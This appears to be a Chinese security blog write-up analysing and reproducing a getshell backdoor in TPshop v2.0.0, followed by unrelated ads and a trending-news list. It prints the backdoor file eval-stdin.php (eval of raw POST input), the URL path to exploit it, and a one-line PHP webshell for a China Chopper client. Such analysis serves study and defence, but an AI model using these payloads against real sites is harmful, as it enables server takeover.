TPshop商城 Getshell后门文件分析与复现
本文作者:i春秋签约作家——Laimooc官网地址:http://www.tp-shop.cn/ 影响版本:TPSHOP v2.0.0 后门文件:eval-stdin.php 内容:
<?php eval('?>' . file_get_contents('php://input')); ?>分析: 使用
file_get_contents('php://input'))接收POST请求的原始数据流 eval函数来执行。 我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不: 利用方法: 访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。 那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接. 采用写入的话就有点麻烦了。 地址: http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 配置:
<O>
<?php eval($_POST[c]);?>
</O>
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 澳门是伟大祖国的一方宝地 7997225
- 2 日本火山喷发灰柱高达3400米 7934528
- 3 星巴克大罢工 7835935
- 4 2024 向上的中国 7771702
- 5 赵丽颖带儿子探班 7640959
- 6 男子钓上一条自带“赎金”的鱼 7589830
- 7 美国女子在地铁上被男子点燃身亡 7429683
- 8 柳岩谈44岁女演员的尴尬 7357044
- 9 唐尚珺35岁读大一 7291498
- 10 大三女生练咏春一起手眼神骤变 7173848